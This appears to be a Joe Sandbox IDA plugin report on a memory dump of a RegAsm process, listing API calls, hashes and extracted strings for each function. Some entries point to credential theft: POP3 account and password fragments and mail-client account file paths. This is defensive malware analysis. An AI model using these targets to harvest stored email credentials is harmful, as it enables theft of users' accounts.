                                                                                                                                                                                                • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: .
                                                                                                                                                                                                • API String ID: 0-248832578
                                                                                                                                                                                                • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                                • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                                                                                • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                                • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                                                                                • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                                                                                                                                                                • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                                • API String ID: 4218353326-3023110444
                                                                                                                                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                                • API String ID: 4218353326-230879103
                                                                                                                                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                                                • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                                • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                                • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                                • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                                • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                                • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                                • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                                • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                                • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                                • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                                • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _free.LIBCMT ref: 100059EA
                                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                • _free.LIBCMT ref: 100059F6
                                                                                                                                                                                                • _free.LIBCMT ref: 10005A01
                                                                                                                                                                                                • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                                                • _free.LIBCMT ref: 10005A17
                                                                                                                                                                                                • _free.LIBCMT ref: 10005A22
                                                                                                                                                                                                • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                                                • _free.LIBCMT ref: 10005A38
                                                                                                                                                                                                • _free.LIBCMT ref: 10005A43
                                                                                                                                                                                                • _free.LIBCMT ref: 10005A51
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                                                • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                                                • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                                                • _free.LIBCMT ref: 100092AB
                                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                • _free.LIBCMT ref: 100092B6
                                                                                                                                                                                                • _free.LIBCMT ref: 100092C1
                                                                                                                                                                                                • _free.LIBCMT ref: 10009315
                                                                                                                                                                                                • _free.LIBCMT ref: 10009320
                                                                                                                                                                                                • _free.LIBCMT ref: 1000932B
                                                                                                                                                                                                • _free.LIBCMT ref: 10009336
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                                                • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                                                • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1922816806-0
                                                                                                                                                                                                • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                                • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3594823470-0
                                                                                                                                                                                                • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                                • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                                                • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                                • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                                • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                                • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                                • _free.LIBCMT ref: 10005B55
                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                                • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                                • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                                • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                                                • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                • API String ID: 4036392271-1520055953
                                                                                                                                                                                                • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                                                • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
